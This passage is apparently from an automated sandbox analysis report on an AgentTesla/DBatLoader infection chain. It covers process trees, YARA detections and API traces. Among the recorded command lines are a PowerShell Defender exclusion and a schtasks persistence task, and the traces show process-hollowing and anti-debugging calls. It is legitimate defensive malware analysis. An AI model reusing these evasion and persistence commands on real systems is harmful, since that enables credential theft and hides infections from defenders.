Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 82%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	10:28:11
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Imagebase:	0xa40000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 66%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	10:28:13
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Imagebase:	0x430000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	10:28:13
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	10:28:14
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:33 /du 23:59 /sc daily /ri 1 /f
Imagebase:	0x4a0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	10:28:14
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	10:28:15
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Imagebase:	0x3a0000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 66%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	10:28:16
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp9170.tmp.cmd""
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	10:28:16
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	10:28:16
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 6
Imagebase:	0x870000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	10:28:16
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Imagebase:	0xb80000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	10:28:17
Start date:	13/11/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	10:28:22
Start date:	13/11/2024
Path:	C:\Users\Public\Libraries\Wisrysxl.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Wisrysxl.PIF"
Imagebase:	0x400000
File size:	1'224'192 bytes
MD5 hash:	86EE0E8789E9C11F707D056C4052292E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 21%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	10:28:23
Start date:	13/11/2024
Path:	C:\Users\Public\Libraries\lxsyrsiW.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\lxsyrsiW.pif
Imagebase:	0x400000
File size:	68'096 bytes
MD5 hash:	C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000019.00000001.2295576638.0000000002440000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	10:28:24
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Temp\neworigin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\neworigin.exe"
Imagebase:	0x2e0000
File size:	250'368 bytes
MD5 hash:	D6A4CF0966D24C1EA836BA9A899751E5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.2422352208.00000000026FC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.2422352208.0000000002704000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.2422352208.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.2422352208.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	10:28:24
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Imagebase:	0x280000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	10:28:30
Start date:	13/11/2024
Path:	C:\Users\Public\Libraries\Wisrysxl.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Wisrysxl.PIF"
Imagebase:	0x400000
File size:	1'224'192 bytes
MD5 hash:	86EE0E8789E9C11F707D056C4052292E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	10:28:31
Start date:	13/11/2024
Path:	C:\Users\Public\Libraries\lxsyrsiW.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\lxsyrsiW.pif
Imagebase:	0x400000
File size:	68'096 bytes
MD5 hash:	C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000001D.00000001.2377904124.0000000002440000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	10:28:32
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Temp\neworigin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\neworigin.exe"
Imagebase:	0xfa0000
File size:	250'368 bytes
MD5 hash:	D6A4CF0966D24C1EA836BA9A899751E5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000002.4526973764.00000000035BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001E.00000002.4526973764.00000000035BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	10:28:32
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Imagebase:	0x510000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	10:28:38
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Imagebase:	0xa10000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	16.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	30.4%
Total number of Nodes:	1630
Total number of Limit Nodes:	19

Executed Functions

Function 02B28D70 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654
threadnativeinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02B289D0: FreeLibrary.KERNEL32(74AD0000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,74AD0000,00000000,00000000), ref: 02B28AAA

Part of subcall function 02B28788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B28814

GetThreadContext.KERNEL32(000008A0,02B97424,ScanString,02B973A8,02B2A93C,UacInitialize,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,UacInitialize,02B973A8), ref: 02B29602

Part of subcall function 02B28400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B28471

Part of subcall function 02B28670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02B286D5

Part of subcall function 02B27A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B27A9F

Part of subcall function 02B27D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B27DEC

SetThreadContext.KERNEL32(000008A0,02B97424,ScanBuffer,02B973A8,02B2A93C,ScanString,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,00000888,00238FF8,02B974FC,00000004,02B97500), ref: 02B2A317
NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(000008A0,00000000,000008A0,02B97424,ScanBuffer,02B973A8,02B2A93C,ScanString,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,00000888,00238FF8,02B974FC), ref: 02B2A324

Part of subcall function 02B2894C: LoadLibraryW.KERNEL32(bcrypt,?,000008A0,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,UacScan), ref: 02B28960
Part of subcall function 02B2894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B2897A
Part of subcall function 02B2894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A0,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize), ref: 02B289B6

Strings

sppc, xrefs: 02B29376
SLGetLicenseInformation, xrefs: 02B2935F
I_QueryTagInformation, xrefs: 02B2A700
Initialize, xrefs: 02B290EA, 02B296F8, 02B2987F, 02B29C68, 02B29ECA, 02B2A03A, 02B2A1AD, 02B2A412, 02B2A743
NtOpenProcess, xrefs: 02B2A8A3
MiniDumpReadDumpStream, xrefs: 02B2A728
ntdll, xrefs: 02B2A625, 02B2A639, 02B2A6F1, 02B2A894, 02B2A8A8
advapi32, xrefs: 02B2A705
UacScan, xrefs: 02B28E73, 02B2908B, 02B29687, 02B29A83, 02B29BF7, 02B2A3A1, 02B2A839
BCryptQueryProviderRegistration, xrefs: 02B2A587
NtOpenObjectAuditAlarm, xrefs: 02B2A634, 02B2A6EC
OpenSession, xrefs: 02B28DA9, 02B291CC, 02B2927E, 02B2A64F, 02B2A795
dbgcore, xrefs: 02B2A719, 02B2A72D
BCryptVerifySignature, xrefs: 02B2A573
NtReadVirtualMemory, xrefs: 02B2A620
ScanString, xrefs: 02B28E02, 02B28FAD, 02B2915B, 02B29583, 02B29769, 02B298F0, 02B29D7D, 02B29F3B, 02B2A0AB, 02B2A21E, 02B2A509, 02B2A5B6
NtSetSecurityObject, xrefs: 02B2A88F
bcrypt, xrefs: 02B2A578, 02B2A58C, 02B2A5A0
MiniDumpWriteDump, xrefs: 02B2A714
BCryptRegisterProvider, xrefs: 02B2A59B
UacInitialize, xrefs: 02B29032, 02B29393, 02B29512, 02B29616, 02B29A12, 02B29B86, 02B2A330
ScanBuffer, xrefs: 02B28ECC, 02B28F54, 02B292EF, 02B29404, 02B294A1, 02B297DA, 02B29961, 02B29AF4, 02B29CD9, 02B29DEE, 02B29FAC, 02B2A11C, 02B2A28F, 02B2A483, 02B2A6A1, 02B2A7E7

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: LibraryMemoryThreadVirtual$ContextFree$AddressAllocateCreateLoadProcProcessReadResumeSectionUnmapUserViewWrite
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 2388221946-51457883
Opcode ID: 720860bb1234922ffa36ce8f489cf3a1d048504d3dea43fbd1c7f3f99b40de82
Instruction ID: d31b7ef75b706298cf3e94f47eca147920a51754cd1f8958eb4517a3c0f01932
Opcode Fuzzy Hash: 720860bb1234922ffa36ce8f489cf3a1d048504d3dea43fbd1c7f3f99b40de82
Instruction Fuzzy Hash: 30E2E175A502289FDB11FB64DD80BCE73BAAF85300F9041F1E149AB215DE30AE89DF56

Function 02B28D6E Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02B289D0: FreeLibrary.KERNEL32(74AD0000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,74AD0000,00000000,00000000), ref: 02B28AAA

Part of subcall function 02B28788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B28814

GetThreadContext.KERNEL32(000008A0,02B97424,ScanString,02B973A8,02B2A93C,UacInitialize,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,UacInitialize,02B973A8), ref: 02B29602

Part of subcall function 02B28400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B28471

Part of subcall function 02B28670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02B286D5

Part of subcall function 02B27A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B27A9F

Strings

sppc, xrefs: 02B29376
SLGetLicenseInformation, xrefs: 02B2935F
I_QueryTagInformation, xrefs: 02B2A700
Initialize, xrefs: 02B290EA, 02B296F8, 02B2987F, 02B29C68, 02B29ECA, 02B2A03A, 02B2A1AD, 02B2A412, 02B2A743
NtOpenProcess, xrefs: 02B2A8A3
MiniDumpReadDumpStream, xrefs: 02B2A728
ntdll, xrefs: 02B2A625, 02B2A639, 02B2A6F1, 02B2A894, 02B2A8A8
advapi32, xrefs: 02B2A705
UacScan, xrefs: 02B28E73, 02B2908B, 02B29687, 02B29A83, 02B29BF7, 02B2A3A1, 02B2A839
BCryptQueryProviderRegistration, xrefs: 02B2A587
NtOpenObjectAuditAlarm, xrefs: 02B2A634, 02B2A6EC
OpenSession, xrefs: 02B28DA9, 02B291CC, 02B2927E, 02B2A64F, 02B2A795
dbgcore, xrefs: 02B2A719, 02B2A72D
BCryptVerifySignature, xrefs: 02B2A573
NtReadVirtualMemory, xrefs: 02B2A620
ScanString, xrefs: 02B28E02, 02B28FAD, 02B2915B, 02B29583, 02B29769, 02B298F0, 02B29D7D, 02B29F3B, 02B2A0AB, 02B2A21E, 02B2A509, 02B2A5B6
NtSetSecurityObject, xrefs: 02B2A88F
bcrypt, xrefs: 02B2A578, 02B2A58C, 02B2A5A0
MiniDumpWriteDump, xrefs: 02B2A714
BCryptRegisterProvider, xrefs: 02B2A59B
UacInitialize, xrefs: 02B29032, 02B29393, 02B29512, 02B29616, 02B2A330
ScanBuffer, xrefs: 02B28ECC, 02B28F54, 02B292EF, 02B29404, 02B294A1, 02B297DA, 02B29961, 02B29AF4, 02B29CD9, 02B29DEE, 02B29FAC, 02B2A11C, 02B2A28F, 02B2A483, 02B2A6A1, 02B2A7E7

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: MemoryVirtual$AllocateContextCreateFreeLibraryProcessReadSectionThreadUnmapUserView
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 3386062106-51457883
Opcode ID: 72212119afbe153ccbdaaa360a80b64b4f411aa58c908872cd98406c1fe6e596
Instruction ID: b3f93cdda9a590f44b4faf4aaec77923743a965370e8e6dd3ad7c23c9ac1f0af
Opcode Fuzzy Hash: 72212119afbe153ccbdaaa360a80b64b4f411aa58c908872cd98406c1fe6e596
Instruction Fuzzy Hash: 4CE2D175A502289FDB11FB64DD80BCE73BAEF85300F9041E1E149AB215DE30AE89DF56

Function 02B15ACC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B10000,02B3E790), ref: 02B15AE8
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B10000,02B3E790), ref: 02B15B06
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B10000,02B3E790), ref: 02B15B24
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B15B42
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B15BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B15B8B
RegQueryValueExA.ADVAPI32(?,02B15D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B15BD1,?,80000001), ref: 02B15BA9
RegCloseKey.ADVAPI32(?,02B15BD8,00000000,?,?,00000000,02B15BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B15BCB
lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B15BE8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B15BF5
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B15BFB
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B15C26
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B15C6D
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B15C7D
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B15CA5
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B15CB5
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B15CDB
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B15CEB

Strings

Software\Borland\Delphi\Locales, xrefs: 02B15B38
Software\Borland\Locales, xrefs: 02B15AFC, 02B15B1A

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: 66f81553ab7cb0b43f42c09deed6479d5bb5a711b9a0086ae204ed81fc399989
Instruction ID: 7a2ce530077188beb64fcaa329d42f8f529dd1c126a4d666c34e84e99597f46f
Opcode Fuzzy Hash: 66f81553ab7cb0b43f42c09deed6479d5bb5a711b9a0086ae204ed81fc399989
Instruction Fuzzy Hash: CB518771A5025C7AFB35DBA88C46FEFB7ADDB44744FC001E1AB44E6181D7749A448FA0

Function 02B2894C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(bcrypt,?,000008A0,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,UacScan), ref: 02B28960
GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B2897A
FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A0,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize), ref: 02B289B6

Part of subcall function 02B27D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B27DEC

Strings

BCryptVerifySignature, xrefs: 02B28973
bcrypt, xrefs: 02B2895F

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
String ID: BCryptVerifySignature$bcrypt
API String ID: 1002360270-4067648912
Opcode ID: cae75c363c25a3ebd496c789de25cb895f617c81b6a078381491425355d927aa
Instruction ID: 02ea73879296f6fb652ecd6f8a8c70ed97984c2c0df079b6b8ef83159f43f98d
Opcode Fuzzy Hash: cae75c363c25a3ebd496c789de25cb895f617c81b6a078381491425355d927aa
Instruction Fuzzy Hash: 15F0FFF0AE9314EEE310A668AA49F93B3DCD380790F0089A9F90C87142CE701856AB20

Function 02B2F744 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KernelBase), ref: 02B2F754
GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B2F766
CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B2F77D

Strings

CheckRemoteDebuggerPresent, xrefs: 02B2F760
